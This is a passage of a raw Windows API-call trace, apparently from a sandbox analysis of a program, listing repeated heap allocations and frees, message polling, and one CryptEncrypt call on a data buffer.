lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0205.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0205.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0205.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0205.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9779f8 | out: hHeap=0x970000) returned 1 [0205.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0205.871] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.871] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0205.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0205.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.872] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0205.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0205.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0205.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0205.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8b340 | out: hHeap=0x970000) returned 1 [0205.873] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0205.874] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.874] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0205.875] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0205.878] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0205.878] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50b78, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0205.878] CryptEncrypt (in: hKey=0xa87310, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e80330*, pdwDataLen=0x8cef60*=0xb000, dwBufLen=0xb008 | out: pbData=0x2e80330*, pdwDataLen=0x8cef60*=0xb008) returned 1 [0205.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0205.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0205.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0205.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0205.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0205.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0205.880] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0205.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0205.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0205.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0205.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0205.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0205.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0205.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0205.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0205.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0205.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0205.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0205.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0205.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0205.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0205.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0205.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0205.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0205.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0205.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0205.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0205.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0205.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0205.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0205.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0205.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0205.881] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0205.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0205.881] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0205.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0205.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0205.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0205.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0205.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f98 | out: hHeap=0x970000) returned 1 [0205.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0205.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0205.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0205.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c08 [0205.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0205.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0205.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0205.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0205.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0205.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0205.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0205.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0205.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0205.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0205.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0205.882] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0205.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0205.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0205.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0205.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0205.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0205.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0205.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.882] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0205.883] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0205.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0205.884] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0205.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0205.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0205.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0205.884] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0205.884] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0205.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0205.885] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0205.885] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0205.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0205.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0205.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0205.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0205.885] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0205.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0205.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0205.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0205.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0205.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0205.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0205.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0205.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0205.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0205.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0205.885] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0205.885] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb008) returned 0x2e8b340 [0205.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0205.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0205.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0205.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0205.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0205.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0205.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0205.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0205.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0205.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0205.888] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0205.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0205.888] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xb008) returned 0x2e96350 [0205.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8b340 | out: hHeap=0x970000) returned 1 [0205.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0205.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0205.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0205.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0205.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0205.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699a8 [0205.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0205.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0205.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.889] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0205.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0205.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0205.889] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0205.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0205.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0205.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0205.889] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0205.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0205.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0205.889] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0205.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0205.889] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0205.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0205.889] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0205.889] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0205.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0205.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0205.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0205.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0205.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0205.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0205.890] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0205.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0205.890] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 